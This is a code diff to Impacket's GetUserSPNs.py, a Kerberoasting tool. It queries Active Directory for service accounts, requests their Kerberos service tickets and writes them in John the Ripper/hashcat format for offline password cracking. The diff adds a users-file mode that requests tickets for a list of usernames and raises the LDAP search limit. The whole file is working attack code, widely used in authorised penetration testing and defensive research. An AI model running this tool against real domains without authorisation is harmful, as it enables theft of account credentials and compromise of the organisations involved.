@@ -1,33 +1,36 @@
-#!/usr/local/bin/python3.8
-#!/usr/local/bin/python3.8
-# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#!/usr/local/bin/python3.13
+#!/usr/local/bin/python3.13
+# Impacket - Collection of Python classes for working with network protocols.
 #
-# This software is provided under under a slightly modified version
+# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# Author:
-#  Alberto Solino (@agsolino)
-#
 # Description:
-#     This module will try to find Service Principal Names that are associated with normal user account.
-#     Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request
-#     will encrypt the ticket with the account the SPN is running under, this could be used for an offline
-#     bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
-#     This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
-#     https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
+#   This module will try to find Service Principal Names that are associated with normal user account.
+#   Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request
+#   will encrypt the ticket with the account the SPN is running under, this could be used for an offline
+#   bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
+#   This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
+#   https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
 #
-#     Original idea of implementing this in Python belongs to @skelsec and his
-#     https://github.com/skelsec/PyKerberoast project
+#   Original idea of implementing this in Python belongs to @skelsec and his
+#   https://github.com/skelsec/PyKerberoast project
 #
-#     This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
-#     Also, disabled accounts won't be shown.
+#   This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
+#   Also, disabled accounts won't be shown.
+#
+# Author:
+#   Alberto Solino (@agsolino)
 #
 # ToDo:
-#  [X] Add the capability for requesting TGS and output them in JtR/hashcat format
-#  [X] Improve the search filter, we have to specify we don't want machine accounts in the answer
-#      (play with userAccountControl)
+#   [X] Add the capability for requesting TGS and output them in JtR/hashcat format
+#   [X] Improve the search filter, we have to specify we don't want machine accounts in the answer
+#       (play with userAccountControl)
 #
+
 from __future__ import division
 from __future__ import print_function
 import argparse
@@ -41,6 +44,7 @@ from pyasn1.codec.der import decoder
 from impacket import version
 from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
 from impacket.examples import logger
+from impacket.examples.utils import parse_credentials
 from impacket.krb5 import constants
 from impacket.krb5.asn1 import TGS_REP
 from impacket.krb5.ccache import CCache
@@ -50,6 +54,7 @@ from impacket.ldap import ldap, ldapasn1
 from impacket.smbconnection import SMBConnection
 from impacket.ntlm import compute_lmhash, compute_nthash
 
+
 class GetUserSPNs:
     @staticmethod
     def printTable(items, header):
@@ -76,6 +81,7 @@ class GetUserSPNs:
         self.__lmhash = ''
         self.__nthash = ''
         self.__outputFileName = cmdLineOptions.outputfile
+        self.__usersFile = cmdLineOptions.usersfile
         self.__aesKey = cmdLineOptions.aesKey
         self.__doKerberos = cmdLineOptions.k
         self.__requestTGS = cmdLineOptions.request
@@ -247,6 +253,10 @@ class GetUserSPNs:
                 logging.error(str(e))
 
     def run(self):
+        if self.__usersFile:
+            self.request_users_file_TGSs()
+            return
+
         if self.__doKerberos:
             target = self.getMachineName()
         else:
@@ -288,7 +298,7 @@ class GetUserSPNs:
             resp = ldapConnection.search(searchFilter=searchFilter,
                                          attributes=['servicePrincipalName', 'sAMAccountName',
                                                      'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
-                                         sizeLimit=999)
+                                         sizeLimit=100000)
         except ldap.LDAPSearchError as e:
             if e.getErrorString().find('sizeLimitExceeded') >= 0:
                 logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
@@ -345,7 +355,7 @@ class GetUserSPNs:
                         logging.debug('Bypassing disabled account %s ' % sAMAccountName)
                     else:
                         for spn in SPNs:
-                            answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])
+                            answers.append([spn, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation])
             except Exception as e:
                 logging.error('Skipping item, cannot process due to error %s' % str(e))
                 pass
@@ -360,27 +370,69 @@ class GetUserSPNs:
 
                 # Get a TGT for the current user
                 TGT = self.getTGT()
+
                 if self.__outputFileName is not None:
                     fd = open(self.__outputFileName, 'w+')
                 else:
                     fd = None
+
                 for user, SPN in users.items():
+                    sAMAccountName = user
+                    downLevelLogonName = self.__targetDomain + "\\" + sAMAccountName
+
                     try:
-                        serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
-                        tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,
+                        principalName = Principal()
+                        principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value
+                        principalName.components = [downLevelLogonName]
+
+                        tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,
                                                                                 self.__kdcHost,
                                                                                 TGT['KDC_REP'], TGT['cipher'],
                                                                                 TGT['sessionKey'])
-                        self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN, fd)
+                        self.outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, self.__targetDomain + "/" + sAMAccountName, fd)
                     except Exception as e:
                         logging.debug("Exception:", exc_info=True)
-                        logging.error('SPN: %s - %s' % (SPN,str(e)))
+                        logging.error('Principal: %s - %s' % (downLevelLogonName, str(e)))
+
                 if fd is not None:
                     fd.close()
 
         else:
             print("No entries found!")
 
+    def request_users_file_TGSs(self):
+
+        with open(self.__usersFile) as fi:
+            usernames = [line.strip() for line in fi]
+
+        self.request_multiple_TGSs(usernames)
+
+    def request_multiple_TGSs(self, usernames):
+        # Get a TGT for the current user
+        TGT = self.getTGT()
+
+        if self.__outputFileName is not None:
+            fd = open(self.__outputFileName, 'w+')
+        else:
+            fd = None
+
+        for username in usernames:
+            try:
+                principalName = Principal()
+                principalName.type = constants.PrincipalNameType.NT_ENTERPRISE.value
+                principalName.components = [username]
+
+                tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,
+                                                                        self.__kdcHost,
+                                                                        TGT['KDC_REP'], TGT['cipher'],
+                                                                        TGT['sessionKey'])
+                self.outputTGS(tgs, oldSessionKey, sessionKey, username, username, fd)
+            except Exception as e:
+                logging.debug("Exception:", exc_info=True)
+                logging.error('Principal: %s - %s' % (username, str(e)))
+
+        if fd is not None:
+            fd.close()
 
 # Process command-line arguments.
 if __name__ == '__main__':
@@ -394,12 +446,13 @@ if __name__ == '__main__':
     parser.add_argument('target', action='store', help='domain/username[:password]')
     parser.add_argument('-target-domain', action='store', help='Domain to query/request if different than the domain of the user. '
                                                                'Allows for Kerberoasting across trusts.')
-    parser.add_argument('-request', action='store_true', default='False', help='Requests TGS for users and output them '
-                                                                               'in JtR/hashcat format (default False)')
+    parser.add_argument('-usersfile', help='File with user per line to test')
+    parser.add_argument('-request', action='store_true', default=False, help='Requests TGS for users and output them '
+                                                                             'in JtR/hashcat format (default False)')
     parser.add_argument('-request-user', action='store', metavar='username', help='Requests TGS for the SPN associated '
                                                           'to the user specified (just the username, no domain needed)')
-    parser.add_argument('-save', action='store_true', default='False', help='Saves TGS requested to disk. Format is '
-                                                                            '<username>.ccache. Auto selects -request')
+    parser.add_argument('-save', action='store_true', default=False, help='Saves TGS requested to disk. Format is '
+                                                                          '<username>.ccache. Auto selects -request')
     parser.add_argument('-outputfile', action='store',
                         help='Output filename to write ciphers in JtR/hashcat format')
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
@@ -432,16 +485,7 @@ if __name__ == '__main__':
     else:
         logging.getLogger().setLevel(logging.INFO)
 
-    import re
-    # This is because I'm lazy with regex
-    # ToDo: We need to change the regex to fullfil domain/username[:password]
-    targetParam = options.target+'@'
-    userDomain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(targetParam).groups('')
-
-    #In case the password contains '@'
-    if '@' in address:
-        password = password + '@' + address.rpartition('@')[0]
-        address = address.rpartition('@')[2]
+    userDomain, username, password = parse_credentials(options.target)
 
     if userDomain == '':
         logging.critical('userDomain should be specified!')
